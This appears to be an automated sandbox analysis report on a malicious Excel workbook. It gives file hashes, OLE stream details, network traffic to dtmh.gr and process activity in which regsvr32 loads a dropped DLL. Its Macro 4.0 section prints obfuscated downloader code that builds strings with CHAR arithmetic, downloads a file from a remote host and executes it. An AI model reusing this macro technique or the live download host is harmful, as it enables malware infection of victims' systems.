                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:47:56 2020, 0x21210013: 0
                                              Entropy (8bit):7.519789176158722
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 78.94%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                              File name:document-1411385003.xls
                                              File size:339968
                                              MD5:0e578c836b3cc5b29771e51f3c4b0cf9
                                              SHA1:2fb23ab9b9439f7d447ec529415e1039143d33d1
                                              SHA256:e4b39e254df2f996274732baea7d3ead38ca845d404aac72e682f378b78531be
                                              SHA512:4f1a3b99eb64a3d98949933e1714144280200ae4c64085ec0803493030425502e98ded7efb0acd0b31c4cc3bfa8a4bf87a3d4640c77470602844cb2092f31050
                                              SSDEEP:6144:WcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpTv:7izo8RnsIROnr6n75Yr
                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4eea286a4b4bcb4

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "document-1411385003.xls"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:Microsoft Excel
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:True

                                              Summary

                                              Code Page:1251
                                              Author:
                                              Last Saved By:
                                              Create Time:2006-09-16 00:00:00
                                              Last Saved Time:2020-11-26 09:47:56
                                              Creating Application:Microsoft Excel

                                              Document Summary

                                              Document Code Page:1251
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:917504

                                              Streams

                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:4096
                                              Entropy:0.367004077607
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:4096
                                              Entropy:0.252910329293
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . ! ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . x 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 21 21 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 327615
                                              General
                                              Stream Path:Workbook
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:327615
                                              Entropy:7.64855011622
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
                                              Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                              Macro 4.0 Code

                                              CALL("Ke"&????2!HY314&"32", "Cr"&????2!IA342&"yA", "JCJ", ????2!HP312&????2!HP327, 0)
                                              
                                              CALL("U"&????2!IA332, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!HP312&????2!HP327&????2!HP341, 0, 0)
                                              
                                              =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!HY314&""32"",""Cr""&????2!IA342&""yA"",""JCJ"",????2!HP312&????2!HP327,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                              "=CALL(""Ke""&????2!HY314&""32"",""Cr""&????2!IA342&""yA"",""JCJ"",????2!HP312,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
                                              "=CALL(""U""&????2!IA332,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!HP312&????2!HP327&????2!HP341,0,0)"=EXEC(????3!W36&????2!HP312&????2!HP327&????2!HP341)=HALT()

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 29, 2020 06:03:04.164385080 CET49165443192.168.2.2278.46.235.88
                                              Nov 29, 2020 06:03:04.185643911 CET4434916578.46.235.88192.168.2.22
                                              Nov 29, 2020 06:03:04.185863972 CET49165443192.168.2.2278.46.235.88
                                              Nov 29, 2020 06:03:04.209053993 CET49165443192.168.2.2278.46.235.88
                                              Nov 29, 2020 06:03:04.512407064 CET49165443192.168.2.2278.46.235.88
                                              Nov 29, 2020 06:03:05.105374098 CET49165443192.168.2.2278.46.235.88
                                              Nov 29, 2020 06:03:06.306679964 CET49165443192.168.2.2278.46.235.88
                                              Nov 29, 2020 06:03:07.508019924 CET49165443192.168.2.2278.46.235.88
                                              Nov 29, 2020 06:03:08.709369898 CET49165443192.168.2.2278.46.235.88
                                              Nov 29, 2020 06:03:11.111841917 CET49165443192.168.2.2278.46.235.88
                                              Nov 29, 2020 06:03:15.917119026 CET49165443192.168.2.2278.46.235.88
                                              Nov 29, 2020 06:03:25.527452946 CET49165443192.168.2.2278.46.235.88

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 29, 2020 06:03:04.077207088 CET5219753192.168.2.228.8.8.8
                                              Nov 29, 2020 06:03:04.139770985 CET53521978.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Nov 29, 2020 06:03:04.077207088 CET192.168.2.228.8.8.80x6029Standard query (0)dtmh.grA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Nov 29, 2020 06:03:04.139770985 CET8.8.8.8192.168.2.220x6029No error (0)dtmh.gr78.46.235.88A (IP address)IN (0x0001)

                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:06:02:40
                                              Start date:29/11/2020
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13f6e0000
                                              File size:27641504 bytes
                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:06:03:05
                                              Start date:29/11/2020
                                              Path:C:\Windows\System32\regsvr32.exe
                                              Wow64 process (32bit):false
                                              Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
                                              Imagebase:0xff590000
                                              File size:19456 bytes
                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >